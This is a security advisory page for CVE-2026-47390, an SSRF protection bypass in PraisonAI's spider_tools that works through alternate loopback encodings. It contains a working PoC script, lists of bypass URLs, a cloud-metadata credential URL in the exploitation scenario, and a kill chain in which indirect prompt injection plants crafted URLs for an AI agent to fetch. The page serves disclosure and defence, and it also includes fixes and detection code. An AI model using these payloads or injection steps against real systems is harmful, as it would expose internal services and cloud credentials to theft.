CVE-2026-47390: PraisonAI: SSRF bypass via loopback alias encodings

GHSA-5c6w-wwfq-7qqm MEDIUM
Published May 29, 2026
CISO Take

PraisonAI's spider_tools implements SSRF protection as an exact-string blocklist that does not normalize alternate loopback representations: decimal-integer, octal, hex, short-form, and trailing-dot variants all bypass the check and reach localhost-bound services. In agentic deployments where user-controlled or LLM-generated URLs are passed to scrape_page() or crawl(), an attacker can read responses from local admin panels or any other HTTP service bound exclusively to loopback. Cloud metadata endpoints (169.254.169.254) are also at risk if the blocklist handles encoded link-local addresses the same way, which the advisory lists as possible but does not confirm. With 69 prior CVEs in this package and SSRF a well-understood cloud pivot technique, the exploitation bar is low once an attacker can influence agent inputs, a realistic condition in RAG pipelines and multi-agent workflows. Upgrade to praisonai 4.6.40 or praisonaiagents 1.6.40 immediately; if patching is delayed, add egress firewall rules blocking loopback, link-local, and RFC 1918 ranges at the network layer.

Sources: NVD, GitHub Advisory, ATLAS

What is the risk?

Medium severity by CVSS (5.5), but contextually elevated for cloud-deployed AI agents. The vulnerability bypasses an explicit security control rather than exploiting default-open behavior, so developers may wrongly believe SSRF protection is active. EPSS data is unavailable, no active exploitation has been observed, and the CVE is not in CISA KEV. Blast radius is modest (1 reported downstream dependent for PraisonAI, 11 for praisonaiagents), but any PraisonAI deployment processing externally influenced URLs is directly in scope. The Local attack vector in the CVSS vector likely reflects standalone desktop use; in containerized or cloud agent deployments, effective exploitability is higher because the attack can be initiated remotely through agent task inputs.

Attack Kill Chain

  1. Initial Influence (AML.T0051.001): Attacker supplies or injects a loopback URL using an alternate encoding (e.g., http://2130706433:8080/ or http://0x7f000001:8080/) into agent input, a crawled webpage, or RAG-indexed content.

  2. Validation Bypass (AML.T0049): spider_tools._validate_url() compares the raw hostname string against an exact blocklist and approves the alternate loopback form without DNS resolution or IP normalization.

  3. SSRF Request (AML.T0053): requests.Session.get() issues an HTTP request to the loopback address, reaching a local-only service such as an admin panel, development server, or cloud instance metadata API.

  4. Data Exfiltration (AML.T0086): The local service response, potentially containing credentials, internal tokens, or configuration data, is returned as agent tool output and may appear in logs, agent context, or user-facing responses.
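
The validation-bypass step comes down to a mismatch between comparing the raw host string and how classic IPv4 parsers (the inet_aton family) interpret that string. The sketch below illustrates the gap under stated assumptions: `BLOCKED_HOSTS` and `naive_is_allowed` are hypothetical stand-ins for an exact-string blocklist, not PraisonAI's actual code, and `parse_legacy_ipv4` is an illustrative reimplementation of the traditional parsing rules.

```python
import ipaddress
from typing import Optional

# Hypothetical exact-string blocklist, standing in for the vulnerable check.
BLOCKED_HOSTS = {"localhost", "127.0.0.1", "::1"}


def naive_is_allowed(host: str) -> bool:
    """Raw string comparison: the pattern the advisory describes as bypassable."""
    return host.lower() not in BLOCKED_HOSTS


def parse_legacy_ipv4(host: str) -> Optional[ipaddress.IPv4Address]:
    """Interpret decimal, octal, hex, and short IPv4 forms the way inet_aton does."""
    labels = host.split(".")
    if not 1 <= len(labels) <= 4:
        return None
    values = []
    for label in labels:
        if not (label.isascii() and label.isalnum()):
            return None
        try:
            if label.lower().startswith("0x"):
                values.append(int(label, 16))
            elif len(label) > 1 and label.startswith("0"):
                values.append(int(label, 8))
            else:
                values.append(int(label, 10))
        except ValueError:
            return None  # not a numeric host, e.g. an ordinary DNS name
    *head, tail = values
    # Leading labels are single octets; the last label fills the remaining bytes.
    if any(v > 255 for v in head) or tail >= 256 ** (4 - len(head)):
        return None
    packed = 0
    for v in head:
        packed = (packed << 8) | v
    packed = (packed << (8 * (4 - len(head)))) | tail
    return ipaddress.IPv4Address(packed)


for alias in ["127.1", "0177.0.0.1", "0x7f000001", "2130706433"]:
    # Each alias passes the string check yet parses to 127.0.0.1.
    print(alias, naive_is_allowed(alias), parse_legacy_ipv4(alias))
```

The trailing-dot form (localhost.) is not numeric, so this parser returns None for it; it is a fully qualified DNS name that the resolver maps to loopback, which is why resolution-based checks are needed in addition to numeric normalization.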

What systems are affected?

| Package | Ecosystem | Vulnerable Range | Patched | Dependents | Share patched | Time to patch |
|---|---|---|---|---|---|---|
| PraisonAI | pip | <= 4.6.39 | 4.6.40 | 1 | 86% | ~0d |
| praisonaiagents | pip | <= 1.6.39 | 1.6.40 | 11 | 82% | ~0d |

Severity & Risk

CVSS 3.1: 5.5 / 10
EPSS: N/A
Exploitation Status: No known exploitation
Sophistication: Trivial

Attack Surface

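Attack Vector (AV): Local
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): None
Availability (A): None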

What should I do?

4 steps
  1. Patch: upgrade praisonai to >= 4.6.40 or praisonaiagents to >= 1.6.40.

  2. Network egress hardening (defense-in-depth): block outbound connections to 127.0.0.0/8, ::1, 169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 via iptables/nftables or cloud security groups on agent host environments.

  3. If implementing custom URL validation, always resolve hostnames to IP addresses using socket.getaddrinfo() before blocklist evaluation — never compare raw hostname strings against a blocklist.

  4. Detection: scan application and proxy logs for outbound requests containing hex IPs (0x7f...), octal notation (0177...), or decimal-encoded loopback (2130706433); in agentic frameworks, audit tool invocation logs for unusual localhost-variant URL patterns.
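
As a rough illustration of step 3, the sketch below resolves the URL's host with socket.getaddrinfo() and evaluates the resulting IP addresses instead of the raw string. The names `resolve_host`, `is_internal`, and `validate_url` are hypothetical and chosen for this example; this is not the patch shipped in praisonai 4.6.40, and the set of address classes treated as internal is an assumption to adapt per deployment.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def resolve_host(host: str, port: int) -> list:
    """Resolve a hostname or literal to the IP addresses the OS would connect to."""
    infos = socket.getaddrinfo(host, port, type=socket.SOCK_STREAM)
    # sockaddr[0] is the address string; drop any IPv6 zone suffix such as %eth0.
    unique = dict.fromkeys(info[4][0].split("%")[0] for info in infos)
    return [ipaddress.ip_address(text) for text in unique]


def is_internal(addr) -> bool:
    """True for loopback, private, link-local, and other non-public ranges."""
    mapped = getattr(addr, "ipv4_mapped", None)
    if mapped is not None:  # e.g. ::ffff:127.0.0.1
        addr = mapped
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def validate_url(url: str) -> list:
    """Return the resolved public IPs for url, or raise ValueError."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError(f"unsupported URL: {url!r}")
    port = parts.port or (443 if parts.scheme == "https" else 80)
    try:
        addresses = resolve_host(parts.hostname, port)
    except socket.gaierror as exc:
        raise ValueError(f"cannot resolve {parts.hostname!r}") from exc
    blocked = [str(a) for a in addresses if is_internal(a)]
    if blocked:
        raise ValueError(f"{parts.hostname!r} resolves to internal address {blocked[0]}")
    return [str(a) for a in addresses]
```

A check like this only covers the moment of validation. If the HTTP client resolves the name again, or follows a redirect, the destination can differ from what was validated, so a fuller design would connect to the validated address and re-check every redirect target.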

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 9 - Risk Management System
ISO 42001
A.9.3 - Operational planning and control
NIST AI RMF
MS-2.6 - Risk or impact assessment for known AI vulnerabilities
OWASP LLM Top 10
LLM07 - Insecure Plugin Design (numbering from the 2023 list; in the 2025 list, LLM07 is System Prompt Leakage)

Frequently Asked Questions

What is CVE-2026-47390?

CVE-2026-47390 is an SSRF protection bypass in PraisonAI's spider_tools. The URL validation uses an exact-string blocklist that does not normalize alternate loopback representations, so decimal-integer, octal, hex, short-form, and trailing-dot variants pass the check and reach localhost-bound services when attacker-influenced URLs are passed to scrape_page(), crawl(), or extract_text(). It is fixed in praisonai 4.6.40 and praisonaiagents 1.6.40.

Is CVE-2026-47390 actively exploited?

No confirmed active exploitation of CVE-2026-47390 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-47390?

  1. Patch: upgrade praisonai to >= 4.6.40 or praisonaiagents to >= 1.6.40.

  2. Network egress hardening (defense-in-depth): block outbound connections to 127.0.0.0/8, ::1, 169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 via iptables/nftables or cloud security groups on agent host environments.

  3. If implementing custom URL validation, always resolve hostnames to IP addresses using socket.getaddrinfo() before blocklist evaluation; never compare raw hostname strings against a blocklist.

  4. Detection: scan application and proxy logs for outbound requests containing hex IPs (0x7f...), octal notation (0177...), or decimal-encoded loopback (2130706433); in agentic frameworks, audit tool invocation logs for unusual localhost-variant URL patterns.
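
The detection step can be approximated with a small log scanner. This is a heuristic sketch, not a vetted detection rule: `classify_host` and `scan_log` are hypothetical names, the sample log lines are invented for illustration, and the trailing-dot rule will also flag legitimate fully qualified names.

```python
import re
from typing import Iterator, Optional, Tuple
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
NUMERIC_LABEL = re.compile(r"^(0x[0-9a-f]+|[0-9]+)$")


def classify_host(host: str) -> Optional[str]:
    """Name the non-canonical encoding used by host, or None if nothing stands out."""
    if host.endswith("."):
        return "trailing-dot"
    labels = host.split(".")
    if len(labels) > 4 or not all(NUMERIC_LABEL.match(label) for label in labels):
        return None  # ordinary DNS name
    if any(label.startswith("0x") for label in labels):
        return "hex"
    if any(len(label) > 1 and label.startswith("0") for label in labels):
        return "octal"
    if len(labels) == 1:
        return "decimal-integer"
    if len(labels) < 4:
        return "short-form"
    return None  # canonical dotted quad


def scan_log(lines) -> Iterator[Tuple[str, str]]:
    """Yield (encoding, url) for every URL whose host uses a suspicious encoding."""
    for line in lines:
        for url in URL_RE.findall(line):
            try:
                host = urlsplit(url).hostname or ""  # hostname is lowercased
            except ValueError:
                continue
            kind = classify_host(host)
            if kind:
                yield kind, url


# Invented log lines, for illustration only.
sample = [
    "tool=scrape_page url=http://2130706433:8765/ status=200",
    "tool=scrape_page url=http://0x7f000001:8765/admin status=200",
    "tool=crawl url=https://example.com/page status=200",
]
for kind, url in scan_log(sample):
    print(kind, url)
```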

What systems are affected by CVE-2026-47390?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, RAG pipelines, web scraping agents, multi-agent pipelines.

What is the CVSS score for CVE-2026-47390?

CVE-2026-47390 has a CVSS v3.1 base score of 5.5 (MEDIUM).

AI Security Impact

Affected AI Architectures

agent frameworks, RAG pipelines, web scraping agents, multi-agent pipelines

MITRE ATLAS Techniques

AML.T0049 Exploit Public-Facing Application
AML.T0051.001 LLM Prompt Injection: Indirect
AML.T0053 AI Agent Tool Invocation
AML.T0086 Exfiltration via AI Agent Tool Invocation

Compliance Controls Affected

EU AI Act: Article 9
ISO 42001: A.9.3
NIST AI RMF: MS-2.6
OWASP LLM Top 10: LLM07 (Insecure Plugin Design, 2023 list numbering)

Technical Details

Original Advisory

### Summary

PraisonAI's `spider_tools` URL validation can be bypassed using alternate loopback host encodings.

The affected component is:

```text
praisonaiagents/tools/spider_tools.py
```

The tool contains a URL validation function intended to block local or unsafe targets before fetching attacker-controlled URLs. However, the validation only blocks a small set of exact host strings such as `localhost` and `127.0.0.1`. It does not normalize hostnames, resolve DNS, parse numeric IPv4 variants, or validate the final resolved IP address before making the request.

As a result, URLs such as the following bypass the protection and still reach loopback services:

```text
http://localhost.:8765/
http://127.1:8765/
http://0177.0.0.1:8765/
http://0x7f000001:8765/
http://2130706433:8765/
```

After the weak validation passes, `scrape_page()` calls `requests.Session.get()` on the attacker-controlled URL. This allows an attacker who can influence URLs passed to `scrape_page`, `crawl`, or `extract_text` to induce SSRF requests against loopback-only services.

This is a server-side request forgery protection bypass.

### Details

The affected code is in:

```text
praisonaiagents/tools/spider_tools.py
```

The vulnerable flow is:

```text
attacker-controlled URL
  -> spider_tools._validate_url(...)
  -> weak exact-host blocklist check
  -> validation passes for alternate loopback encodings
  -> scrape_page(...)
  -> requests.Session.get(attacker_url)
  -> loopback service is reached
```

The validation appears to block only exact local hostnames or exact IPv4 strings. For example, it blocks simple forms such as:

```text
localhost
127.0.0.1
```

However, equivalent loopback forms are not rejected before the request is made.

Confirmed bypass examples:

```text
http://localhost.:8765/
http://127.1:8765/
http://0177.0.0.1:8765/
http://0x7f000001:8765/
http://2130706433:8765/
```

These values can resolve or be interpreted as loopback addresses by the HTTP client / underlying networking stack, while bypassing the string-based validation.

The issue is not that `spider_tools` can fetch arbitrary URLs. The issue is that it attempts to provide SSRF protection, but the protection can be bypassed with alternate representations of loopback addresses.

### PoC

The following PoC is non-destructive. It starts a local HTTP server on `127.0.0.1:8765`, then sends several alternate loopback URL forms through the real `spider_tools` validation/fetch path.

The expected secure behavior is that all loopback variants should be rejected before any HTTP request is made. The actual vulnerable behavior is that the alternate loopback forms pass validation and reach the local server.

#### Full PoC

```python
#!/usr/bin/env python3
"""PoC for PraisonAI spider_tools localhost-alias SSRF bypass."""

from __future__ import annotations

import sys
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path

REPO_ROOT = Path(__file__).resolve().parents[3] / "repos" / "praisonai"
AGENTS_ROOT = REPO_ROOT / "src" / "praisonai-agents"
SPIDER_TOOLS = AGENTS_ROOT / "praisonaiagents/tools/spider_tools.py"


def verify_source() -> None:
    expected = [
        "def _validate_url",
        "requests.Session",
        ".get(",
    ]
    text = SPIDER_TOOLS.read_text(encoding="utf-8")
    for needle in expected:
        if needle not in text:
            raise RuntimeError(f"source verification failed: {needle!r} not found in {SPIDER_TOOLS}")


class LocalHandler(BaseHTTPRequestHandler):
    hits: list[tuple[str, str | None]] = []
    body = b"LOCAL-SPIDER-SSRF-SECRET"

    def do_GET(self) -> None:  # noqa: N802
        self.__class__.hits.append((self.path, self.headers.get("Host")))
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(self.body)))
        self.end_headers()
        self.wfile.write(self.body)

    def log_message(self, format: str, *args) -> None:  # noqa: A003
        return


def main() -> int:
    if not SPIDER_TOOLS.exists():
        raise SystemExit("missing local PraisonAI source tree")
    verify_source()
    sys.path.insert(0, str(AGENTS_ROOT))

    # Import the real shipped implementation.
    #
    # Depending on the exact public API exposed by spider_tools.py,
    # use the exported scrape function available in the local version.
    # The important path is:
    #
    #   _validate_url(url)
    #     -> requests.Session.get(url)
    #
    import praisonaiagents.tools.spider_tools as spider_tools

    server = HTTPServer(("127.0.0.1", 8765), LocalHandler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()

    candidates = [
        "http://localhost.:8765/",
        "http://127.1:8765/",
        "http://0177.0.0.1:8765/",
        "http://0x7f000001:8765/",
        "http://2130706433:8765/",
    ]

    try:
        for url in candidates:
            LocalHandler.hits.clear()
            try:
                # Prefer the real public scraping API when available.
                if hasattr(spider_tools, "scrape_page"):
                    result = spider_tools.scrape_page(url)
                elif hasattr(spider_tools, "extract_text"):
                    result = spider_tools.extract_text(url)
                elif hasattr(spider_tools, "crawl"):
                    result = spider_tools.crawl(url)
                else:
                    raise RuntimeError("No expected spider_tools public fetch function found")

                reached = bool(LocalHandler.hits)
                contains_secret = "LOCAL-SPIDER-SSRF-SECRET" in str(result)
                print(f"{url} passed=True reached_loopback={reached} contains_secret={contains_secret}")
                if not reached:
                    raise SystemExit(f"[poc] MISS: {url} did not reach loopback server")
            except Exception as exc:
                print(f"{url} blocked_or_failed={type(exc).__name__}: {exc}")
                raise
    finally:
        server.shutdown()
        server.server_close()
        thread.join(timeout=1)

    print("[poc] HIT: alternate loopback URL forms bypassed spider_tools SSRF protection")
    return 0


if __name__ == "__main__":
    raise SystemExit(main())
```

#### Confirmed local result

The following bypasses were confirmed locally:

```text
localhost.   True ok ok local hit
127.1        True ok ok local hit
0177.0.0.1   True ok ok local hit
0x7f000001   True ok ok local hit
2130706433   True ok ok local hit
```

This demonstrates that the validation allows alternate loopback representations and that the request reaches a local-only HTTP service.

#### Expected secure behavior

All loopback-equivalent addresses should be blocked before the HTTP request is made.

Examples that should be rejected:

```text
http://localhost/
http://localhost./
http://127.0.0.1/
http://127.1/
http://0177.0.0.1/
http://0x7f000001/
http://2130706433/
http://[::1]/
```

#### Actual vulnerable behavior

Several alternate loopback representations pass validation and are fetched by the tool.

### Impact

An attacker who can influence URLs passed to PraisonAI's spider tools can cause the process to send HTTP requests to loopback-only services.

Potential impact includes:

* SSRF against localhost-only admin panels or development servers;
* access to local HTTP services that are not intended to be reachable remotely;
* retrieval of local service responses into the agent/tool output;
* possible access to cloud metadata or private-network services if equivalent bypasses exist for those address ranges in a given deployment.

The most direct confirmed impact is loopback SSRF through alternate hostname/IP encodings.

This report does not claim arbitrary TCP access or remote code execution. The demonstrated behavior is HTTP(S) SSRF through the spider URL-fetching feature.

Exploitation Scenario

An adversary embeds a crafted URL in content indexed by a PraisonAI agent's RAG pipeline or in a web page being crawled, for example a link to http://2130706433:8080/admin. When the agent processes this content and invokes scrape_page() to follow the URL, the string-based validation approves the decimal-encoded loopback address, and requests.Session issues a GET to the local admin service. The server response, which may contain configuration data, session tokens, or internal API credentials, is returned as tool output to the agent, where it may be logged, embedded in agent context, or surfaced to the requesting user. In a cloud environment, the same technique aimed at the metadata service needs that address's own encoding: 2130706433 decodes to 127.0.0.1, whereas 169.254.169.254 is 2852039166, giving http://2852039166/latest/meta-data/iam/security-credentials/. Such a request could yield IAM credentials for the host instance if the blocklist also fails to normalize link-local addresses, which the advisory lists as possible but unconfirmed.
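
The integer and prefixed forms used in this scenario follow from treating the four octets of an IPv4 address as one 32-bit number. The sketch below derives them with Python's standard ipaddress module; `ipv4_aliases` is a hypothetical helper name introduced for illustration.

```python
import ipaddress


def ipv4_aliases(dotted: str) -> dict:
    """Return alternate textual encodings of a dotted-quad IPv4 address."""
    addr = ipaddress.IPv4Address(dotted)
    value = int(addr)              # a*256**3 + b*256**2 + c*256 + d
    a, b, c, d = addr.packed       # the four octets as integers
    return {
        "decimal": str(value),
        "hex": hex(value),
        "octal": "0%o.%d.%d.%d" % (a, b, c, d),  # first octet in octal
        "short": "%d.%d" % (a, value & 0xFFFFFF),  # octet + 24-bit remainder
    }


print(ipv4_aliases("127.0.0.1"))
print(ipv4_aliases("169.254.169.254"))
```

For 127.0.0.1 this gives 2130706433, 0x7f000001, 0177.0.0.1, and 127.1, matching the bypass forms in the advisory; for 169.254.169.254 the decimal form is 2852039166.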

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
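
To show how this vector maps to the 5.5 base score, the sketch below applies the base-score equations and metric weights from the CVSS v3.1 specification. The function names are chosen for this example, and only base metrics are handled (no temporal or environmental metrics).

```python
import math

# Metric weights from the CVSS v3.1 specification.
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "UI": {"N": 0.85, "R": 0.62},
    "CIA": {"H": 0.56, "L": 0.22, "N": 0.0},
}
# Privileges Required weights depend on Scope (U = unchanged, C = changed).
PR_WEIGHTS = {
    "U": {"N": 0.85, "L": 0.62, "H": 0.27},
    "C": {"N": 0.85, "L": 0.68, "H": 0.5},
}


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in the v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the CVSS v3.1 base score for a vector string."""
    metrics = dict(item.split(":") for item in vector.split("/")[1:])
    scope = metrics["S"]
    iss = 1 - math.prod(1 - WEIGHTS["CIA"][metrics[m]] for m in "CIA")
    if scope == "U":
        impact = 6.42 * iss
    else:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    exploitability = (8.22 * WEIGHTS["AV"][metrics["AV"]]
                      * WEIGHTS["AC"][metrics["AC"]]
                      * PR_WEIGHTS[scope][metrics["PR"]]
                      * WEIGHTS["UI"][metrics["UI"]])
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    if scope == "C":
        total *= 1.08
    return roundup(min(total, 10))


print(base_score("CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"))  # 5.5
```

For illustration only, and not as an official re-score: changing AV:L to AV:N in the same vector yields 6.5 under these equations, which gives a sense of how much the Local classification contributes to the Medium rating.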

Timeline

Published: May 29, 2026
Last Modified: May 29, 2026
First Seen: May 30, 2026

Related Vulnerabilities